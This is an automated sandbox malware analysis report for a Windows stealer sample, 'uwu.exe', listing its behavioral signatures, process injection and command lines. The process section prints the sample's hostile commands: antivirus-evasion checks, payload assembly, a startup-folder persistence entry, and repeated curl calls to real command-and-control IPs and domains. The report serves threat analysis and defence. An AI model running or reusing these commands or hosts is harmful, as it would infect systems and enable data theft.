Malware Analysis Report

2025-06-16 00:20

Sample ID 241112-t594yavrdv
Target uwu.exe
SHA256 ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197
Tags
discovery spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ec059d014e9208dceded5ce614ea4f95e26c1ed45ad81ce5de348e5df7647197

Threat Level: Known bad

The file uwu.exe was found to be: Known bad.

Malicious Activity Summary

discovery spyware stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Checks computer location settings

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Enumerates processes with tasklist

Drops file in Windows directory

Browser Information Discovery

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Gathers system information

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-12 16:39

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-12 16:39

Reported

2024-11-12 16:42

Platform

win7-20240708-en

Max time kernel

146s

Max time network

120s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 840 created 1204 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\Explorer.EXE

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoilOasis C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
File opened for modification C:\Windows\RebatesPalm C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
File opened for modification C:\Windows\DouglasWind C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\uwu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2624 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\uwu.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\uwu.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\uwu.exe C:\Windows\SysWOW64\cmd.exe
PID 2624 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\uwu.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2804 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2804 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2804 wrote to memory of 992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2804 wrote to memory of 712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 712 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2804 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2804 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2804 wrote to memory of 1816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 2804 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2804 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
PID 2804 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
PID 2804 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
PID 2804 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif
PID 2804 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 2804 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 2804 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 2804 wrote to memory of 1768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 840 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 740 wrote to memory of 2148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 740 wrote to memory of 2148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 740 wrote to memory of 2148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 740 wrote to memory of 2148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 840 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe
PID 840 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\uwu.exe

"C:\Users\Admin\AppData\Local\Temp\uwu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Tuition Tuition.cmd & Tuition.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 226443

C:\Windows\SysWOW64\findstr.exe

findstr /V "AthleticsTabletsUserImaging" Slovenia

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Tackle + ..\Heather + ..\Column + ..\Environment + ..\Events + ..\Merit + ..\Law + ..\Explanation d

C:\Users\Admin\AppData\Local\Temp\226443\Crossword.pif

Crossword.pif d

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\Admin\AppData\Local\temp\115 2>&1

C:\Windows\SysWOW64\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\temp\115 > C:\Users\Admin\AppData\Local\temp\622

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nciks" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ctids" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\spyii" "178.215.224.161/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\agpeu" "178.215.224.251/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gjlcd" "178.215.224.65/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bqtvf" "bnrwinonalolita.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iioke" "dionisarnoldcefee.com/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ssyce" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rbetm" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

